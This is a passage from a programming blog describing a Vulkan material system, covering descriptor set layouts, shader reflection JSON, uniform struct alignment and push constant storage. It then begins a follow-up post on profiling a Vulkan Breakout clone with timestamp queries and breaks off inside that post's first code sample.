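    uint32_t pipelineBinds = 0;
    uint32_t materialSetBinds = 0; // sets 2 and 3, bound together
};

// Walks the same loop nest as the pseudocode and tallies how often each
// kind of bind would be recorded. No Vulkan calls are made.
inline BindCounts countBinds(uint32_t viewCount, const std::vector<ShaderGroup>& shaders)
{
    BindCounts counts;
    for (uint32_t view = 0; view < viewCount; ++view)
    {
        ++counts.globalSetBinds; // once per view
        for (const ShaderGroup& shader : shaders)
        {
            ++counts.pipelineBinds; // once per shader
            counts.materialSetBinds += shader.materialCount; // once per material
        }
    }
    return counts;
}
```

<p>For one view with two shaders that have three and two materials respectively, that’s a single bind of set 0, two pipeline binds, and five material binds. The global data is paid for once no matter how many materials get drawn.</p>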
<p>Technically speaking, sets 2 and 3 could be one set, but having a separation between static and dynamic data made sense to me, since I have to keep around a lot more information about the dynamic data to facilitate updating it later, but time will tell if this is a good idea or not. I think it largely depends on if there’s a higher cost associated with binding multiple descriptor sets in one call to vkCmdBindDescriptorSets.</p>
<h2 id="vkdescriptorpools-can-store-descriptors-of-different-types">VkDescriptorPools Can Store Descriptors of Different Types</h2>
<p>This is pretty obvious if you’re reading the actual API docs, but when I started this, most of my information was coming from tutorials like <a href="https://vulkan-tutorial.com/">vulkan-tutorial.com</a>, which never explicitly points out that your descriptor pools don’t have to be segregated by descriptor type. You can store uniform buffers, combined image samplers, dynamic buffers, the whole shebang in the same pool.</p>
<h2 id="getting-arbitrary-descriptor-set-layouts">Getting Arbitrary Descriptor Set Layouts</h2>
<p>The last three points were more about general Vulkan knowledge, but the rest are all about implementation details.</p>
<p>The most obvious problem with building a generic material loading system in Vulkan vs OpenGL is the lack of shader reflection available at runtime. In OpenGL all this functionality was there by default, but in Vulkan we need to use the wonderful <a href="https://github.com/KhronosGroup/SPIRV-Cross">SPIR-V Cross</a> library to help us get at this information.</p>
<p>I didn’t want to embed SPIR-V Cross in my runtime application, since it felt like unnecessary bloat, so I wrote a separate application that I called the “ShaderPipeline” (also available <a href="https://github.com/khalladay/VkMaterialSystem/tree/master/ShaderPipeline">on github</a>). This program runs whenever a shader has been edited, and handles compiling GLSL into SPIR-V, and creating json files (.refl files) that store reflection information about these shaders.</p>
<p>One of these .refl files might look like the following:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="p">{</span>
<span class="s">"descriptor_sets"</span><span class="o">:</span> <span class="p">[</span>
<span class="p">{</span>
<span class="s">"set"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"binding"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"GLOBAL_DATA"</span><span class="p">,</span>
<span class="s">"size"</span><span class="o">:</span> <span class="mi">32</span><span class="p">,</span>
<span class="s">"type"</span><span class="o">:</span> <span class="s">"UNIFORM"</span><span class="p">,</span>
<span class="s">"members"</span><span class="o">:</span> <span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"mouse"</span><span class="p">,</span>
<span class="s">"size"</span><span class="o">:</span> <span class="mi">16</span><span class="p">,</span>
<span class="s">"offset"</span><span class="o">:</span> <span class="mi">16</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}</span>
<span class="p">],</span>
<span class="s">"global_sets"</span><span class="o">:</span> <span class="p">[</span>
<span class="mi">0</span>
<span class="p">],</span>
<span class="s">"static_sets"</span><span class="o">:</span> <span class="p">[],</span>
<span class="s">"dynamic_sets"</span><span class="o">:</span> <span class="p">[],</span>
<span class="s">"static_set_size"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"dynamic_set_size"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"num_static_uniforms"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"num_static_textures"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"num_dynamic_uniforms"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"num_dynamic_textures"</span><span class="o">:</span> <span class="mi">0</span>
<span class="p">}</span></code></pre></figure>
<p>You’ll notice that at the end I have some extra data about which descriptor sets are global, dynamic, or static, and how many of each type we have. This information is obviously not technically necessary, but this way I can decide to change which sets belong to which category at the ShaderPipeline level instead of the runtime application, and having the counts available was just handier than counting them later.</p>
<h2 id="fill-gaps-in-your-vkdescriptorsetlayout-array-with-empty-elements">Fill Gaps In Your VkDescriptorSetLayout Array With Empty Elements</h2>
<p>This one definitely threw me for a while until I figured out what to do, since it’s not something that I saw in any tutorial or example code before trying this project out.</p>
<p>One of the first things you need to do when you’re creating your material is to make VkDescriptorSetLayouts for each descriptor set in use by the shaders in your material. Eventually, you use this array of DescriptorSetLayouts as part of your VkPipelineLayoutCreateInfo struct. One thing you may have noticed is that the VkDescriptorSetLayoutCreateInfo struct doesn’t have any field for specifying which set that layout is for. This means the API assumes that the array of VkDescriptorSetLayouts that you use is a contiguous collection of sets - that is - if your array is 3 elements long, it is for sets 0, 1, and 2.</p>
<p>In practice, you’ll likely have gaps in the sets that your shaders use, especially if you assign each set number a specific use case, like I did above. In this case, you need to make a VkDescriptorSetLayout for each set you aren’t using as well. These “empty” layouts will have their bindingCount set to 0, and their pBindings array set to null, but still need to be in your final array of set layouts, or else nothing is going to work right.</p>
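<p>Here’s a rough sketch of the gap-filling step on its own, using plain structs instead of the real Vulkan types so it can be read in isolation. BindingDesc, SetLayoutDesc and buildContiguousLayouts are hypothetical names; in a real application each entry in the returned array would be turned into a VkDescriptorSetLayout, with the empty ones created using a bindingCount of 0 and a null pBindings.</p>

```cpp
#include <cstdint>
#include <map>
#include <vector>

// Hypothetical stand-ins for VkDescriptorSetLayoutBinding and for the data
// that would go into a VkDescriptorSetLayoutCreateInfo.
struct BindingDesc
{
    uint32_t binding;
};

struct SetLayoutDesc
{
    std::vector<BindingDesc> bindings; // empty means "placeholder set"
};

// Takes the sets the shaders actually use (keyed by set number) and returns
// one entry per set index from 0 up to the highest set in use, so that
// array index == set number. Unused indices get an empty entry.
inline std::vector<SetLayoutDesc> buildContiguousLayouts(
    const std::map<uint32_t, std::vector<BindingDesc>>& usedSets)
{
    std::vector<SetLayoutDesc> layouts;
    if (usedSets.empty())
        return layouts;

    // std::map is ordered by key, so the last key is the highest set number
    uint32_t highestSet = usedSets.rbegin()->first;
    layouts.resize(highestSet + 1);

    for (const auto& entry : usedSets)
        layouts[entry.first].bindings = entry.second;

    return layouts;
}
```

<p>With shaders that only use sets 0, 2 and 3, this produces a four element array where index 1 is an empty placeholder, which is the shape the pipeline layout expects.</p>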
<h2 id="if-youre-manually-specifying-a-struct-that-maps-to-a-set-alignment-matters">If you’re manually specifying a struct that maps to a set, alignment matters</h2>
<p>To keep things simple, I’m keeping my global data as a mapped struct, since I’m assuming (hoping?) that because it’s not a lot of data, and it only gets updated once a frame, there won’t be much of a performance penalty (this is untested right now though, so… ymmv).</p>
<p>When I first set this up, I defined my struct like so:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">GlobalShaderData</span>
<span class="p">{</span>
<span class="n">glm</span><span class="o">::</span><span class="n">float32</span> <span class="n">time</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">mouse</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">vec2</span> <span class="n">resolution</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">mat4</span> <span class="n">viewMatrix</span><span class="p">;</span>
<span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">worldSpaceCameraPos</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>and this compiled and ran…sorta. Data was getting sent to the gpu, but the wrong data seemed to be filling the variables in the shader. Turns out, this is because (as mentioned earlier) vec4 and mat4 members of a uniform block are 16 byte aligned in Vulkan, and nothing in my C++ struct guaranteed the same padding.</p>
<p>Awkwardly, fixing this problem in MSVC looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">GlobalShaderData</span>
<span class="p">{</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">float32</span> <span class="n">time</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">mouse</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec2</span> <span class="n">resolution</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">mat4</span> <span class="n">viewMatrix</span><span class="p">;</span>
<span class="kr">__declspec</span><span class="p">(</span><span class="n">align</span><span class="p">(</span><span class="mi">16</span><span class="p">))</span> <span class="n">glm</span><span class="o">::</span><span class="n">vec4</span> <span class="n">worldSpaceCameraPos</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>I’m about 110% positive there’s a less awful way of doing this, so please, please let me know what it is <a href="https://twitter.com/khalladay">on Twitter</a>.</p>
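<p>One option that isn’t tied to MSVC is the standard alignas specifier from C++11, paired with static_asserts so the compiler checks the offsets for you. The sketch below uses tiny stand-in vector types (Vec2, Vec4, Mat4) instead of glm so that it compiles on its own; I’d expect it to behave the same with the glm types, but treat that as an assumption and keep the asserts.</p>

```cpp
#include <cstddef>
#include <cstdint>

// Stand-ins for the glm types so the sketch compiles without glm.
struct Vec2 { float x, y; };
struct Vec4 { float x, y, z, w; };
struct Mat4 { Vec4 columns[4]; };

struct GlobalShaderData
{
    alignas(16) float time;
    alignas(16) Vec4 mouse;
    alignas(16) Vec2 resolution;
    alignas(16) Mat4 viewMatrix;
    alignas(16) Vec4 worldSpaceCameraPos;
};

// Compile-time checks that the C++ layout has every member on a 16 byte
// boundary. If someone reorders or adds a member, the build breaks here
// instead of the shader quietly reading the wrong bytes.
static_assert(offsetof(GlobalShaderData, time) == 0, "time offset");
static_assert(offsetof(GlobalShaderData, mouse) == 16, "mouse offset");
static_assert(offsetof(GlobalShaderData, resolution) == 32, "resolution offset");
static_assert(offsetof(GlobalShaderData, viewMatrix) == 48, "viewMatrix offset");
static_assert(offsetof(GlobalShaderData, worldSpaceCameraPos) == 112, "camera offset");
static_assert(sizeof(GlobalShaderData) == 128, "struct size");
```

<p>It’s still one annotation per member, so it’s not dramatically prettier, but it’s portable and the asserts document the layout the shader is expecting.</p>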
<p>That’s the end of the “potentially helpful to everyone” segment of the post, if you want to know more about the structure of my material system so far, read on!</p>
<h2 id="my-ugly-little-material-system">My Ugly Little Material System</h2>
<p>To preface: I’m going to include more information than anyone needs, because I wish implementation details about how someone else had approached this problem were readily available to me before I started on this path.</p>
<p>As I mentioned earlier, my system works in two passes. The first pass, called the “ShaderPipeline”, is an application that gets run whenever a shader is modified. This handles compiling GLSL into SPIR-V, and generates the reflection files I talked about earlier.</p>
<p>Materials are defined in their own json files (I don’t love json, but <a href="https://github.com/Tencent/rapidjson">rapidjson</a> is really easy to use), which specify which shaders to use for each stage, and default values for their inputs. A simple material might look like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="p">{</span>
<span class="s">"shaders"</span><span class="o">:</span>
<span class="p">[</span>
<span class="p">{</span>
<span class="s">"stage"</span><span class="o">:</span> <span class="s">"vertex"</span><span class="p">,</span>
<span class="s">"shader"</span><span class="o">:</span> <span class="s">"vertex_uvs"</span><span class="p">,</span>
<span class="s">"defaults"</span><span class="o">:</span>
<span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span><span class="s">"Instance"</span><span class="p">,</span>
<span class="s">"members"</span><span class="o">:</span>
<span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"tint"</span><span class="p">,</span>
<span class="s">"value"</span><span class="o">:</span> <span class="p">[</span><span class="mi">0</span><span class="p">.</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">.</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">.</span><span class="mi">0</span><span class="p">,</span> <span class="mi">1</span><span class="p">.</span><span class="mi">0</span><span class="p">]</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">},</span>
<span class="p">{</span>
<span class="s">"stage"</span><span class="o">:</span> <span class="s">"fragment"</span><span class="p">,</span>
<span class="s">"shader"</span><span class="o">:</span> <span class="s">"fragment_passthrough"</span><span class="p">,</span>
<span class="s">"defaults"</span><span class="o">:</span>
<span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"texSampler"</span><span class="p">,</span>
<span class="s">"value"</span><span class="o">:</span><span class="s">"../data/textures/airplane.png"</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}</span></code></pre></figure>
<p>When a material is loaded from a file, this material file is unpacked into a Material::Definition struct, which is formatted to make it easy to access the data we need when creating the Vulkan material. Below is what that struct looks like, but if you want to know what the custom types inside it are (like PushConstantBlock), go check out <a href="https://github.com/khalladay/VkMaterialSystem/blob/master/VkMaterialSystem/material_creation.h">material_creation.h</a>.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">Definition</span>
<span class="p">{</span>
<span class="n">PushConstantBlock</span> <span class="n">pcBlock</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">ShaderStageDefinition</span><span class="o">></span> <span class="n">stages</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">map</span><span class="o"><</span><span class="kt">uint32_t</span><span class="p">,</span> <span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">DescriptorSetBinding</span><span class="o">>></span> <span class="n">descSets</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="kt">uint32_t</span><span class="o">></span> <span class="n">dynamicSets</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="kt">uint32_t</span><span class="o">></span> <span class="n">staticSets</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="kt">uint32_t</span><span class="o">></span> <span class="n">globalSets</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numStaticUniforms</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numStaticTextures</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numDynamicUniforms</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numDynamicTextures</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">staticSetsSize</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">dynamicSetsSize</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>The Material::Definition struct is what gets passed to the material creation function. If you really wanted to, you could create a definition at runtime and make new materials on the fly. I’m sure at some point I’ll think of a clever reason to do that.</p>
<p>The advantage of this Material::Definition struct is that it’s trivial to add more information to it. If I wanted my material json files to specify blend mode, ZWrite behaviour, Culling Mode, Polygon Mode, or anything else, I can just add a field to this and grab it out of the json. For now, the creation method just assumes I want an opaque, ZWriting, Cull Back, Polygon Filled material, but that will be made configurable pretty much as soon as I want to have a translucent material.</p>
<p>Once loaded, all the data needed to render a material is stored in a MaterialRenderData struct:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">MaterialRenderData</span>
<span class="p">{</span>
<span class="c1">//general material data</span>
<span class="n">VkPipeline</span> <span class="n">pipeline</span><span class="p">;</span>
<span class="n">VkPipelineLayout</span> <span class="n">pipelineLayout</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">layoutCount</span><span class="p">;</span>
<span class="n">VkDescriptorSetLayout</span><span class="o">*</span> <span class="n">descriptorSetLayouts</span><span class="p">;</span>
<span class="n">VkDescriptorSet</span><span class="o">*</span> <span class="n">descSets</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numDescSets</span><span class="p">;</span>
<span class="n">UniformBlockDef</span> <span class="n">pushConstantLayout</span><span class="p">;</span>
<span class="kt">char</span><span class="o">*</span> <span class="n">pushConstantData</span><span class="p">;</span>
<span class="c1">//we don't need a layout for static data since it cannot be</span>
<span class="c1">//changed after initialization</span>
<span class="n">VkBuffer</span><span class="o">*</span> <span class="n">staticBuffers</span><span class="p">;</span>
<span class="n">VkDeviceMemory</span> <span class="n">staticUniformMem</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numStaticBuffers</span><span class="p">;</span>
<span class="c1">//for now, just add buffers here to modify. when this</span>
<span class="c1">//is modified to support material instances, we'll change it</span>
<span class="c1">//to something more sane.</span>
<span class="n">MaterialDynamicData</span> <span class="n">dynamic</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>There are a few things to talk about here. Firstly, I store the data used for a material’s push constants in the RenderData struct, so that if nothing has changed since the last time they were set, we have that data already sorted out. Rather than store each of the push constant members in a map, or other collection, I keep all the data for the entire push constant block in a char* buffer, and then store layout data about that char* in a UniformBlockDef struct, which looks like this:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">UniformBlockDef</span>
<span class="p">{</span>
<span class="c1">//stride 2 - hashed name / member offset</span>
<span class="kt">uint32_t</span><span class="o">*</span> <span class="n">layout</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">blockSize</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">memberCount</span><span class="p">;</span>
<span class="n">VkShaderStageFlags</span> <span class="n">visibleStages</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>As the comment says, instead of storing string names for the member vars, I hash them and store them along with each member’s offset into the buffer.</p>
<p>Setting a push constant value on a material then becomes a simple matter of looping over this layout buffer until you find the member you want, and using the offset data located next to it:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">setPushConstantData</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">matId</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span><span class="o">*</span> <span class="n">var</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">data</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">size</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MaterialRenderData</span><span class="o">&</span> <span class="n">rData</span> <span class="o">=</span> <span class="n">Material</span><span class="o">::</span><span class="n">getRenderData</span><span class="p">(</span><span class="n">matId</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">varHash</span> <span class="o">=</span> <span class="n">hash</span><span class="p">(</span><span class="n">var</span><span class="p">);</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">rData</span><span class="p">.</span><span class="n">pushConstantLayout</span><span class="p">.</span><span class="n">memberCount</span> <span class="o">*</span> <span class="mi">2</span><span class="p">;</span> <span class="n">i</span> <span class="o">+=</span> <span class="mi">2</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">rData</span><span class="p">.</span><span class="n">pushConstantLayout</span><span class="p">.</span><span class="n">layout</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="n">varHash</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">rData</span><span class="p">.</span><span class="n">pushConstantLayout</span><span class="p">.</span><span class="n">layout</span><span class="p">[</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">];</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">rData</span><span class="p">.</span><span class="n">pushConstantData</span> <span class="o">+</span> <span class="n">offset</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Then when it’s time for that material to be rendered, I can just grab the entire buffer of push constant data and send it on its way.</p>
<p>I like this approach to the problem because it makes Push Constant members (and other dynamic data, which uses a similar paradigm) “fire and forget” data. That is, nothing blows up if I try to set a push constant var on a material that doesn’t have that member; the function just doesn’t find the member in the layout buffer and does nothing. It ends up working very much like the functions for setting shader inputs on Unity’s Material class.</p>
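<p>To make the “fire and forget” behaviour concrete, here’s a minimal, self-contained sketch of the same lookup with all the Vulkan bits stripped out. The PushConstantBlock struct, the setPushConstant and hashName functions, and the choice of FNV-1a as the hash are all stand-ins made up for this example; they aren’t the names or the hash used in the project.</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp">#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical stand-in for the push constant part of a material.
struct PushConstantBlock
{
    // Pairs of (hashed member name, byte offset), like the layout buffer above.
    std::vector<uint32_t> layout;
    // CPU-side copy of the push constant data, handed to Vulkan at draw time.
    std::vector<unsigned char> data;
};

// FNV-1a, used here only as an example; any stable string hash would do.
uint32_t hashName(const char* name)
{
    uint32_t h = 2166136261u;
    for (; *name; ++name)
    {
        h ^= static_cast<unsigned char>(*name);
        h *= 16777619u;
    }
    return h;
}

// Returns true if the member was found and written, false if the call was ignored.
bool setPushConstant(PushConstantBlock& block, const char* name, const void* src, uint32_t size)
{
    const uint32_t nameHash = hashName(name);
    for (size_t i = 0; i + 1 < block.layout.size(); i += 2)
    {
        if (block.layout[i] == nameHash)
        {
            const uint32_t offset = block.layout[i + 1];
            // Refuse writes that would run past the end of the block.
            if (static_cast<size_t>(offset) + size > block.data.size()) return false;
            std::memcpy(block.data.data() + offset, src, size);
            return true;
        }
    }
    return false; // unknown member: nothing is written and nothing blows up
}</code></pre></figure>
<p>Setting a member that exists copies the bytes to that member’s offset, and setting one that doesn’t exist simply returns false, so calling code never needs to know which materials actually have which members.</p>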
<p>I use this same paradigm to handle setting dynamic uniform data, although in that case I have to call vkCmdUpdateBuffer instead of just memcpying, since I have to update device local memory. This could probably be sped up by collecting all the updates for a frame and then doing the vulkan update once, but I’ll worry about that in phase 2. Dynamic uniforms also need a bit more information stored about them, so I have a separate struct, called MaterialDynamicData to store that:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">MaterialDynamicData</span>
<span class="p">{</span>
<span class="kt">uint32_t</span> <span class="n">numInputs</span><span class="p">;</span>
<span class="c1">// stride: 4 - hashed name / buffer index / member size / member offset</span>
<span class="c1">// for images- hashed name / textureViewPtr index / desc set write idx / padding</span>
<span class="kt">uint32_t</span><span class="o">*</span> <span class="n">layout</span><span class="p">;</span>
<span class="n">VkBuffer</span><span class="o">*</span> <span class="n">buffers</span><span class="p">;</span>
<span class="n">VkDeviceMemory</span> <span class="n">uniformMem</span><span class="p">;</span>
<span class="n">VkWriteDescriptorSet</span><span class="o">*</span> <span class="n">descriptorSetWrites</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>The big difference between this and the push constant data is that I’m also keeping the VkWriteDescriptorSet structs around, so that I can change what textures are being used at runtime, and the layout buffer is storing more information per member, but it’s all pretty much working the same way as the push constants.</p>
<p>These MaterialRenderData structs are stored in a map (boo!) that uses uint32_ts as keys. When the renderer wants to get the information about a mesh’s material, it uses the integer material name to get the corresponding struct, and Bob’s your uncle.</p>
<h2 id="problems-and-limitations-with-my-system">Problems and Limitations With My System</h2>
<p>Oh boy, there’s a lot of them. Probably the biggest is that none of it has actually survived being used in a real project, but I suppose there are some more specific things to point out.</p>
<p>Number one is that storing the VkDeviceMemory directly in the material is probably bad, and should likely be replaced by an actual allocator doing actual allocator things.</p>
<p>Secondly, as mentioned before, this doesn’t handle material instances at all yet, so if you want two materials, using the same shaders but a different texture, you need two whole materials to do it. Phase 2 of this project will remedy that, and add some more customization options to the Material::Definition struct.</p>
<p>All my materials are stored in maps, and setting any data on them requires a map lookup to get the MaterialRenderData struct for that material. This results in a LOT of unnecessary map lookups. Looking up materials by id is going to happen an awful lot, and I’m not thrilled about using a map at all (but it was easy!). Instead, this should probably do something like store materials in an array, use the integer id to store an index into the array and some additional data to handle when an array slot gets re-used (like <a href="http://bitsquid.blogspot.com/2014/08/building-data-oriented-entity-system.html">Bitsquid does with their ECS</a>).</p>
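<p>For reference, here’s a rough sketch of what that array-plus-generation idea could look like. Everything in it (MaterialHandle, MaterialStore, and the one-field stand-in for MaterialRenderData) is hypothetical and isn’t code from the project; it’s only meant to show how a stale id can be detected after an array slot gets re-used.</p>
<figure class="highlight"><pre><code class="language-cpp" data-lang="cpp">#include <cstdint>
#include <vector>

// Stand-in for the real struct, just so the example compiles on its own.
struct MaterialRenderData { uint32_t placeholder; };

// The "integer id": an array index plus a generation counter.
struct MaterialHandle
{
    uint32_t index;
    uint32_t generation;
};

class MaterialStore
{
private:
    struct Slot
    {
        MaterialRenderData data;
        uint32_t generation;
        bool alive;
    };
    std::vector<Slot> slots;
    std::vector<uint32_t> freeList; // indices of slots that can be re-used

public:
    MaterialHandle create(const MaterialRenderData& data)
    {
        uint32_t index;
        if (!freeList.empty())
        {
            // Re-use a dead slot; its generation was already bumped in destroy().
            index = freeList.back();
            freeList.pop_back();
            slots[index].data = data;
        }
        else
        {
            index = static_cast<uint32_t>(slots.size());
            slots.push_back(Slot{ data, 0, false });
        }
        slots[index].alive = true;
        return MaterialHandle{ index, slots[index].generation };
    }

    // Returns nullptr for stale or invalid handles instead of the wrong material.
    MaterialRenderData* get(MaterialHandle h)
    {
        if (h.index >= slots.size()) return nullptr;
        Slot& slot = slots[h.index];
        if (!slot.alive || slot.generation != h.generation) return nullptr;
        return &slot.data;
    }

    void destroy(MaterialHandle h)
    {
        if (get(h) == nullptr) return;  // already destroyed, or a stale handle
        slots[h.index].alive = false;
        ++slots[h.index].generation;    // invalidates every outstanding handle
        freeList.push_back(h.index);
    }
};</code></pre></figure>
<p>A lookup here is one bounds check and one integer compare rather than a map traversal, and a handle to a destroyed material fails the generation check even if a new material has since moved into the same slot.</p>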
<p>It also should probably support hot reloading of shaders to make editing easier, maybe I should add a phase 3?</p>
<p>Regardless, hopefully this article was helpful to someone! If you want to say hi / want to point out something dumb I’m doing, give me a shout <a href="https://twitter.com/khalladay">on Twitter</a>, or @Khalladay on <a href="https://gamedev.mastodon.place">Mastodon</a>.</p>
Improving Vulkan Breakout
2017-08-30T00:00:00+00:00
http://kylehalladay.com/blog/tutorial/vulkan/2017/08/30/Vulkan-Uniform-Buffers-pt2
<p>There are lots of reasons why I love the internet, but one of the big ones is that it gives me a way to learn from folks that I would never get to interact with in real life.</p>
<p>Two weeks ago I posted about <a href="http://kylehalladay.com/blog/tutorial/vulkan/2017/08/13/Vulkan-Uniform-Buffers.html">Comparing Uniform Data Transfer Methods In Vulkan</a>, and immediately got a bunch of great suggestions from Twitter (thanks <a href="https://twitter.com/SaschaWillems2">@SaschaWillems2</a>!), and <a href="https://www.reddit.com/r/vulkan/comments/6tf9ut/trying_to_wrap_my_head_around_vulkan_wrote_a_blog/">from reddit</a> on how I could improve things. There was enough there that I thought it warranted revisiting my Breakout clone to test out some new ideas.</p>
<div align="center">
<img src="/images/post_images/2017-08-30/learnding.PNG" />
<font size="2">Me irl</font>
<br /><br />
</div>
<p>The main pieces of feedback were:</p>
<ul>
<li>vkCmdWriteTimestamp could be used to get more fine grained timing data</li>
<li>I really didn’t need to be using _aligned_malloc with my dynamic uniform buffer approach</li>
<li>It might be faster to use device-local memory</li>
<li>With the approaches that don’t use push-constants, it might be faster to re-use command buffers instead of creating them every frame</li>
</ul>
<p>It all sounded like great advice to me, so I decided to try out each point listed above, to see if the conclusions drawn in the first post are still valid.</p>
<p>Starting from the top:</p>
<h2 id="use-vkcmdwritetimestamp">Use vkCmdWriteTimestamp</h2>
<p>I loved this bit of feedback, because it gave me another tool to use to do performance testing! Especially because before hearing about this bit of the api, I had no idea how to profile the performance of a specific chunk of a command buffer.</p>
<p>vkCmdWriteTimestamp writes its timing data into a query, and queries live in a VkQueryPool (there’s no standalone query object to create). So the first step to getting timing data from vulkan is to create one of those:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">VkQueryPoolCreateInfo</span> <span class="n">createInfo</span> <span class="o">=</span> <span class="p">{};</span>
<span class="n">createInfo</span><span class="p">.</span><span class="n">sType</span> <span class="o">=</span> <span class="n">VK_STRUCTURE_TYPE_QUERY_POOL_CREATE_INFO</span><span class="p">;</span>
<span class="n">createInfo</span><span class="p">.</span><span class="n">pNext</span> <span class="o">=</span> <span class="n">nullptr</span><span class="p">;</span>
<span class="n">createInfo</span><span class="p">.</span><span class="n">queryType</span> <span class="o">=</span> <span class="n">VK_QUERY_TYPE_TIMESTAMP</span><span class="p">;</span>
<span class="n">createInfo</span><span class="p">.</span><span class="n">queryCount</span> <span class="o">=</span> <span class="mi">2</span><span class="p">;</span>
